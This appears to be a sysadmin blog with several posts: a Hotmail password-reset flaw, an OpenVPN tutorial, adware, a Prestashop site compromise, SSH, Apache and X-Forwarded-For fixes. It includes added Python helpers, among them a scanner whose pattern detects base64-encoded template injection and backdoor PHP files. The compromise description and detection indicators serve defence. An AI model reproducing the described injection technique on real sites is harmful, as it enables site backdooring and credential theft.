A vulnerability in the Hotmail password reset pages, which allowed hackers to get access to ANY Hotmail/MSN account, has been widely exploited over the past week.

I found a video on YouTube dated April 12 which describes the security hole. It is trivial: it only needs the modification of one email field during the request of the password reset page, after which the password reset link is sent to an arbitrary email.

My MSN/passport.net accounts (and those of many of my contacts) were briefly hacked during the night of April 17 to 18. I then informed MSRC about an unknown vulnerability in the password reset page, and it seems the vulnerability was plugged on April 19 or 20.

What surprises me is Microsoft's communication: there has been no public statement about the vulnerability, and all the hacked accounts have been permanently blocked and need to be unblocked manually by Microsoft employees. Some have been unblocked after asking on the answers.microsoft.com forums, but thousands remain blocked (no password reset, whether by email, SMS or through customer service, helps).

It is April 24 and most of the users don't even know this is Microsoft's fault. I'm surprised they didn't bother to help the hacked customers get their accounts back; this is another big disappointment about Microsoft's security, communication and ethics.

Other sites talking about the vulnerability:

http://syria.telecomix.org/

http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/

http://hackingworldnews.blogspot.fr/2012/04/yet-another-hotmail-exploit-for-avril.html


UPDATE 26/04:

MSRC tweeted about the fix:

https://twitter.com/#!/msftsecresponse/status/195568235654021121

I got my account back after contacting customer service. For this you need to follow the link on the page saying you're blocked, and then log in with a new (unblocked) account. The mess has ended... at least, let's hope so.

Here is the direct link to the correct support page:

http://windows.microsoft.com/en-us/windows-live/get-support?selectedproduct=Hotmail&selectedissue=Your%20account%20has%20been%20temporarily%20blocked&productKey=wolmain

UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay!

http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

——–

Looks like thepiratebay.se links are blocked in MSN Messenger: anybody who tries to send a link, even to the homepage, gets an error back:

I'd be curious to know whether it was mistakenly categorized as a site containing viruses or whether it was a move by Microsoft to "hit" thepiratebay and the revenue it generates from visits.

Alvotech Vserver VPS with OpenVPN

| February 10th, 2012

Renting a server at Alvotech and thinking about installing OpenVPN? Then follow this tutorial.

This tutorial was done on the default configuration of the Alvotech VPS, Debian 5 64bit, and on Debian 6 64bit.

The specs page of the vservers shows that TUN/TAP is usable, but when you rent the VPS, no TUN interface is enabled.

The first thing is to ask support to enable it; after they say they did, you need to reboot your server through the control panel.

Note that you don't need any iptables rule: IP forwarding is enabled, and you cannot add any iptables rule anyway, as Alvotech enables the necessary rules on the host.

Then log in to your server through ssh and check ifconfig; you should see something like this:

tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:11782 errors:0 dropped:0 overruns:0 frame:0
TX packets:8389 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1258182 (1.1 MiB) TX bytes:5467118 (5.2 MiB)

Great, now do:

apt-get install openvpn

cd /etc/openvpn

mkdir easy-rsa

cp -r /usr/share/doc/openvpn/examples/easy-rsa/* easy-rsa/

cd easy-rsa/2.0/

source ./vars

./clean-all

./build-key-server server

./build-key client1

./build-dh

ln -s /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys

cd /etc/openvpn

Now create a file server.conf with this content:

port 1194
proto udp
dev tun2391-136 #Your TUN device in ifconfig
ifconfig 10.0.2.97 10.0.2.98 # your TUN interface settings in ifconfig
ifconfig-noexec
route-noexec
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 3
fragment 1200
mssfix 1200
ca keys/ca.crt
cert keys/server.crt
key keys/server.key
dh keys/dh1024.pem
user nobody
group nogroup
tls-server
push "dhcp-option DNS 8.8.8.8"

Restart openvpn:

/etc/init.d/openvpn restart

Now copy ca.crt, client1.crt and client1.key to your client, and create a client.conf file (or client.ovpn) with this content:

client
dev tun
proto udp
remote 88.88.88.88 1194 #your server ip address/port
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
ns-cert-type server
comp-lzo
verb 3
ifconfig 10.0.2.98 10.0.2.97 #change it according to the IPs of your TUN interface
redirect-gateway
fragment 1200
mssfix 1200

And now just run "sudo openvpn client.conf". On Windows you might need to adjust the paths to something like "cert c:\\Users\\admin\\desktop\\client1.crt" (for the key and certs).

If you need another client to connect, just ask support for another TUN device (they added one on my server), copy server.conf to server2.conf, modify the TUN interface name/IPs and change the OpenVPN port in server2.conf, and don't forget to generate a second client certificate!

Enjoy!

(thanks to the support @ Alvotech for providing the details I was missing)
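The most common slip in the setup above is the mirrored "ifconfig" line: the client must use the server's peer/local addresses swapped, the "remote" port must match "port", and the server must keep "ifconfig-noexec"/"route-noexec" so it never touches the pre-provisioned TUN device. Here is an added consistency check for such a server.conf/client.conf pair (example code, not from the original post); the two embedded configs are the tutorial's, trimmed to the directives the check compares.

```python
SERVER_CONF = """\
port 1194
proto udp
dev tun2391-136
ifconfig 10.0.2.97 10.0.2.98
ifconfig-noexec
route-noexec
fragment 1200
mssfix 1200
"""
CLIENT_CONF = """\
client
dev tun
proto udp
remote 88.88.88.88 1194
ns-cert-type server
ifconfig 10.0.2.98 10.0.2.97
fragment 1200
mssfix 1200
"""

def parse_conf(text):
    """Map each directive to its argument list; '#' comments and blanks are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            key, *args = line.split()
            conf[key] = args
    return conf

def check_pair(server_text, client_text):
    """Return a list of problems; an empty list means the pair is consistent."""
    s, c = parse_conf(server_text), parse_conf(client_text)
    problems = []
    if s.get("ifconfig", [])[::-1] != c.get("ifconfig"):
        problems.append("client ifconfig must be the server's local/peer swapped")
    if "ifconfig-noexec" not in s or "route-noexec" not in s:
        problems.append("server must not reconfigure the pre-provisioned TUN device")
    if "ns-cert-type" not in c:
        problems.append("client does not check that the server cert is a server cert")
    remote = c.get("remote", [])
    remote_port = remote[1] if len(remote) > 1 else "1194"  # OpenVPN default port
    if remote_port != s.get("port", ["1194"])[0]:
        problems.append("client remote port does not match server port")
    for opt in ("proto", "fragment", "mssfix"):
        if s.get(opt) != c.get(opt):
            problems.append(f"{opt} differs between server and client")
    return problems
```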

Vshare plugin *IS* an adware.

Whether you are on Mac, Windows or Linux it is the same, and you don't even need the toolbar, only the plugin.

I installed the old version of the Vshare plugin in my Firefox on Linux (the old version because the newest isn't available on Linux); then some popups started to appear on sites like wikipedia.org, loaded from files hosted on widdit.com and leading to search.searchcompletion.com (a quick Google search shows some Windows users also see this site as their browser home page after installing Vshare).

Widdit belongs to an Israeli company (SimplyGen), and so does Vshare. Maybe both sites are from the same company.

At this point I don't know if it only adds some random popups or also does other nasty things (like replacing ads). I didn't read any other article on the subject, so I decided to write this post. If you have other info, post it in the comments!

Today I woke up and connected to a Prestashop site I'm setting up.
I hadn't installed anything extra on it (only my custom template), and it wasn't in the search engines either.
I noticed a strange blank line in the footer... DOH!

When I looked, the footer contained an obfuscated script: it builds a string from an array of numeric character codes (turned into text with String.fromCharCode) and passes the result to eval.

And this in footer.tpl was causing it: a {literal}...{/literal} block at the end of the template holding the same script, base64-encoded, inside a base64_decode() call.

Also, 2 PHP files were created in the upload/ and download/ folders, with a creation time matching the exact time I logged in to the back office this morning!

Apparently Prestashop.com was compromised and somebody inserted a malicious script, which executed in any admin's browser window and made him backdoor his own site.

All the infected shops' employee credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

The fix:
Be sure to delete modules/her.php
Remove the JavaScript code at the end of your footer.tpl theme files.
Be sure to create these folders:
tools/smarty/compile/
tools/smarty/cache/

Put back the .htaccess files of upload/ and download/

You can clear *.php files from upload/ and download/

Clear ALL your cache.
Move your admin folder.
Reset your MySQL password.
Reset all your employees' passwords!

The vulnerability has been fixed on prestashop.com.

This shows how including external content (HTML) is really risky and should be avoided at all costs. External content should always be parsed and displayed safely.

More information on this thread:
http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

http://www.prestashop.com/blog/article/please_read_security_procedure/
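The clean-up list above doubles as a set of indicators. Here is an added read-only scan for them (example code, not Prestashop's own tool): a base64_decode() call inside a Smarty {literal} block in a theme .tpl, the modules/her.php backdoor, .php files in upload/ and download/, and a missing .htaccess in those two folders. The themes/<name>/ layout is assumed, and the sample shop tree is constructed in a temporary directory with placeholder content.

```python
import re
import tempfile
from pathlib import Path

INJECTED_TPL = re.compile(r"\{literal\}.*base64_decode\(", re.S)

def scan_shop(root):
    """Return a sorted list of (tag, relative path) findings under a shop root."""
    root = Path(root)
    hits = []
    # 1. theme templates carrying a base64_decode() call inside {literal}
    for tpl in (root / "themes").rglob("*.tpl"):
        if INJECTED_TPL.search(tpl.read_text(errors="replace")):
            hits.append(("TPL_BASE64", str(tpl.relative_to(root))))
    # 2. the backdoor module named in the post
    if (root / "modules" / "her.php").is_file():
        hits.append(("BACKDOOR", "modules/her.php"))
    for folder in ("upload", "download"):
        # 3. PHP dropped into folders that should hold no executable code
        for php in (root / folder).rglob("*.php"):
            hits.append(("DROPPED_PHP", str(php.relative_to(root))))
        # 4. the .htaccess the post says to put back is missing
        if (root / folder).is_dir() and not (root / folder / ".htaccess").is_file():
            hits.append(("NO_HTACCESS", folder + "/.htaccess"))
    return sorted(hits)

def make_sample(infected=True):
    """Build a constructed shop tree in a temp dir and return its root (demo only)."""
    root = Path(tempfile.mkdtemp())
    for d in ("themes/default", "modules", "upload", "download"):
        (root / d).mkdir(parents=True)
    footer = '<div id="footer">{$HOOK_FOOTER}</div>\n'
    if infected:  # placeholder payload string, not the real one
        footer += '{literal}base64_decode("PHNjcmlwdD4uLi4="){/literal}\n'
        (root / "modules" / "her.php").write_text("<?php // placeholder\n")
        (root / "upload" / "x.php").write_text("<?php // placeholder\n")
    else:
        for folder in ("upload", "download"):
            (root / folder / ".htaccess").write_text("Deny from all\n")
    (root / "themes" / "default" / "footer.tpl").write_text(footer)
    return root
```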

I was searching for this fix for quite some time. I couldn't forward X any more using "ssh -Y" or "ssh -X" to my Debian server (I have xauth installed); I always got this error:

~$ xterm
xterm Xt error: Can't open display:
xterm:  DISPLAY is not set

"X11UseLocalhost no" made it work, but this wasn't the right solution.

In this bug report I found that I had the same problem and the same symptoms: I had disabled IPv6 support, and this is what broke the forwarding!

The solution is to add:

AddressFamily inet

in sshd_config! (or enable IPv6 again ;) )

OK, this has been all over the internet for years, but I really had to write a post about it, as these guys spam my mailbox every year.

This company is trying to convince people that they need to renew (and obviously transfer) their domain names with them. Their letter looks very professional, and they are still active, which means they might be making good money.

Here's the envelope (click to see better):

And the letter:


Also, their website is www.domainrenewalgroup.com (no way I hard-link this s***), and their former name was "Domain Registry of America".

Before reading this article, you should know that HTTP_X_FORWARDED_FOR should only be used for websites behind a proxy; otherwise you should use REMOTE_ADDR! This article is about getting the right visitor IP through HTTP_X_FORWARDED_FOR for applications behind a reverse proxy.

You might have run into this, as it's not so well documented. Note that I'm using nginx as the reverse proxy, and this may not be the case with all servers.

Yes, HTTP_X_FORWARDED_FOR might return multiple IPs, and I've read several bogus statements on the internet saying the first IP is the right one. This is incorrect.

The first IP may be the real client behind many proxies, but it can be fake (the header can be set by the client).

So what is correct is to take the LAST IP from the list, which is the IP that connected to your (reverse) proxy; this is what you need in 99% of cases, trust me.

Here is the code in PHP:

// The header is only set when the request came through the reverse proxy; fall back to REMOTE_ADDR otherwise
$xff = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : '';
$ip_array = explode(",", $xff);
// The last entry is the address that connected to the reverse proxy
$remoteip = trim($ip_array[count($ip_array) - 1]) ?: $_SERVER['REMOTE_ADDR'];
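The "take the last IP" rule generalized, as an added example that is not from the original post: walk the X-Forwarded-For list from the right, skipping the addresses of your own proxies, and the first address you do not control is the client. With one reverse proxy that is exactly the last entry. The function also covers the case the post's intro warns about: if the peer that connected (REMOTE_ADDR) is not one of your proxies, the header is untrusted and ignored. The trusted range and the header values are constructed for the demo.

```python
import ipaddress

def client_ip(xff_header, remote_addr, trusted_proxies):
    """Pick the client address from X-Forwarded-For as seen behind trusted proxies.

    remote_addr is the peer that connected to the application. If it is not a
    trusted proxy, anything in the header may have been set by the client, so
    remote_addr itself is returned.
    """
    trusted = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(addr):
        return any(addr in net for net in trusted)

    peer = ipaddress.ip_address(remote_addr)
    if not is_trusted(peer):
        return str(peer)
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    # The rightmost entry was appended by the nearest proxy; walk leftwards
    # past our own proxies until the first address we do not control.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: stop trusting the header here
        if not is_trusted(addr):
            return str(addr)
    return str(peer)  # only our proxies (or nothing) in the header
```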

Today I had to face a weird problem with Apache 2. I wanted to set up a webmail on the SAME virtual host that I was using to proxy to another host.
Here's a summary of my configuration:

<VirtualHost *:80>
    ServerAdmin sysadmin@localhost
    DocumentRoot /var/www/folder
    ServerName localhost

    Alias /mail /var/lib/roundcube/
    <Directory /var/lib/roundcube/>
        Options Indexes Includes FollowSymLinks
        AllowOverride All
        AuthType Basic
        AuthUserFile /var/lib/roundcube/.htpasswd
        AuthName "Protected Folder"
        require valid-user
    </Directory>

    ProxyRequests Off
    ProxyPreserveHost On
    <Proxy *>
        Order deny,allow
        Allow from all
    </Proxy>
    ProxyPass /mail/ !
    ProxyPass / http://0.0.0.0/ ttl=60 retry=0 status=I keepalive=on timeout=2500 disablereuse=on
</VirtualHost>

The problem was that basic auth wasn't working correctly in this setup: Apache answered with a 200 instead of a 401, which prevented the browser from understanding that it was actually an authentication challenge.

But this config worked fine without the auth (the webmail was working), and it worked fine with auth but without ProxyPass.
So what was wrong?! Thanks to the guys @freenode, I discovered that Apache was proxying the requests for the custom error documents in /error/ (I had uncommented the custom errors in apache2.conf). The solution was to add:

ProxyPass /error/ !

Turn LogLevel to debug if you have a similar issue; in my case I could read this:

[Fri Mar 04 15:44:36 2011] [debug] mod_proxy_http.c(56): proxy: HTTP: canonicalising URL //10.10.10.10/error/HTTP_UNAUTHORIZED.html.var
[Fri Mar 04 15:44:36 2011] [debug] proxy_util.c(1506): [client 1.1.1.1] proxy: http: found worker http://10.10.10.10/ for http://10.10.10.10/error/HTTP_UNAUTHORIZED.html.var

Hope it helps.

I had to create a plugin for WPMU to let users add a Dailymotion Videowall in the sidebar.

It is available at this page: http://wordpress.org/extend/plugins/dailymotion-videowall-widget/

Stay tuned for a multi-language version!

Here’s the link if you want to donate: